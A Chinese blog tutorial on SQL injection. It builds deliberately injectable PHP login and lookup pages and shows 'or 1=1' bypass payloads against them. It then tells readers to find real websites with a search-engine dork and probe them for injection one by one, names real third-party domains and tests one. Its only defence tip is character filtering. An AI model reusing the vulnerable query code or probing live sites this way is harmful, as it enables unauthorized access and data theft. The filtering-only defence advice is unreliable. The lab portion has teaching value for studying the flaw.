最近在整理web安全方面的知识,发现以前写的这一篇有bug,于是重新编辑发表了一下,下面是分享内容。
网上和书上对SQL注入讲的感觉挺复杂的,但是就我理解来看,SQL注入就是利用数据库查询语句的漏洞,用户通过特殊的输入,构造出特殊的查询语句从而进行一些非预期的操作。这些非预期的操作包括非法登录,窃取数据库中的信息,甚至是销毁信息的操作。
下面是登录数据库的创建代码:
CREATE TABLE login ( id INT AUTO_INCREMENT PRIMARY KEY, name VARCHAR(20), passwd VARCHAR(20) );创建俩用户
INSERT INTO login(name,passwd) VALUES ('xiaoming','xm'); INSERT INTO login(name,passwd) VALUES ('lihua','lh');下面是登录界面:
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>登陆</title> </head> <body> <form method="get" action="login.php"> <p>用户名:<input name="name" type="text"></p> <p>密码:<input name="passwd" type="password"></p> <input type="submit" value="登陆"> </form> </body> </html>下面是登录后台处理代码
<?php /** * Created by PhpStorm. * User: zhoupan * Date: 8/24/16 * Time: 4:15 PM */ if ($_GET['name'] != null) { $name = $_GET['name']; $passwd = $_GET['passwd']; $connect = new mysqli('localhost', 'root', 'root'); if (!$connect) { die('Connect DataBase Error!'); } $select = $connect->select_db('SQLInjection'); if (!$select) { die('Select DataBase Error!'); } $quert = "select * from login where name = \"" . $name . "\" and passwd = \"".$passwd."\";"; $result = $connect->query($quert); $arr = $result->fetch_array(); if (is_array($arr)) { echo "登陆成功"; } else { echo "登陆失败,用户名或密码错误!"; } }正常的登录,输入用户名和密码,如果用户名和密码同时符合,则登录成功,否则失败,我们来研究以下数据库的查询语句:
$quert = "select * from login where name = \"" . $name . "\" and passwd = \"".$passwd."\";";变换一下,方面观察:
select * from login where name = " $name " and passwd = " $passwd ";想一下,怎样通过特殊的变量 name 和 passwd 来实SQL成功查询呢?
# 方式一 $name = 任意 $passwd = " or 1=1 ; # select * from login where name = "xiaoming" and passwd = "" or 1 = 1 ; # "; # 方式二 $name =" " or 1 = 1 ; # $passwd 任意 select * from login where name = "xiaoming " or 1 = 1 ;# and passwd = "";验证: 方式一: 结果: 方式二: 结果:
通过这种方式,就可以实现非法登录,从而实现某些不可告人的目的。
当然啦,上面是自己写的代码,自己清楚代码实现,那么我们怎么知道那些网站存在这样的漏洞呢?当然啦,最简单的方法就是自己一个一个网站来试,可以在谷歌上面键入”inurl:/news/read.php?id=”,来找符合这种规则的网站,然后一个一个的试。那么试的方法呢?这得通过猜测得到。
不如一个网页url为:http://www.qzjcsz.cn/news/read.php?id=24
那么我们推测他的SQL语句应该是:select * from table_name where id = $id
那么我们检验是否存在SQL注入漏洞时,就可以这样:http://www.qzjcsz.cn/news/read.php?id=24 and 1=1
如果可以正常返回,然后再输入:http://www.qzjcsz.cn/news/read.php?id=24 and 1=2
如果不能正确返回,则表示此网站存在SQL注入漏洞,那就恭喜你啦。
来个例子:http://cnyork.cn/news/read.php?id=179
当我们输入:http://cnyork.cn/news/read.php?id=179 and 1 = 1
出现:
而输入http://cnyork.cn/news/read.php?id=179 and 1 = 2
同样出现上面结果,表明此网站不存在简单的SQL注入漏洞
SQL:
CREATE TABLE info( id int AUTO_INCREMENT PRIMARY KEY , name VARCHAR(20) UNICODE, balance DOUBLE DEFAULT 0 );查询界面:
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>登陆</title> </head> <body> <form method="get" action="select.php"> <input type="text" name="id"> <input type="submit" value="提交"> </form> </body> </html>后台响应:
<?php /** * Created by PhpStorm. * User: zhoupan * Date: 8/24/16 * Time: 11:40 AM */ if($_GET['id'] != null) { $id = $_GET['id']; echo $id; require_once "DB_login.php"; $connect = new mysqli($DB_HOST, $DB_USER, $DB_PASSWD); if (!$connect) { die("Connect DataBase Error"); } $select = $connect->select_db($DB_NAME); if (!$select) { die("Select Databases Error"); } $query = "select id,name,balance from info where id = ".$id.";"; $result = $connect->query($query); echo "<table border='1' >"; echo "<tr><th>ID</th><th>用户名</th><th>余额</th></tr>"; while ($row = $result->fetch_array()) { echo "<tr align='center'>"; echo "<td>" . $row['id'] . "</td>"; echo "<td>" . $row['name'] . "</td>"; echo "<td>" . $row['balance'] . "</td>"; echo "</tr>"; } }效果图:
简述以下作用,输入id,检索出对应的信息 那么我们怎样能一次性拿出全部信息呢? 思考一下…… 很简单:
结果:
最简单的方法,就是对用户的输入进行严格的处理过滤,去除掉特殊的字符,而想要完全避免SQL注入几乎是不可能的事情,所谓道高一尺,魔高一丈,作为开发者,我们不能完全考虑到,但是只要在编码的过程中稍微小心一点,就可以避免大多数的安全漏洞。
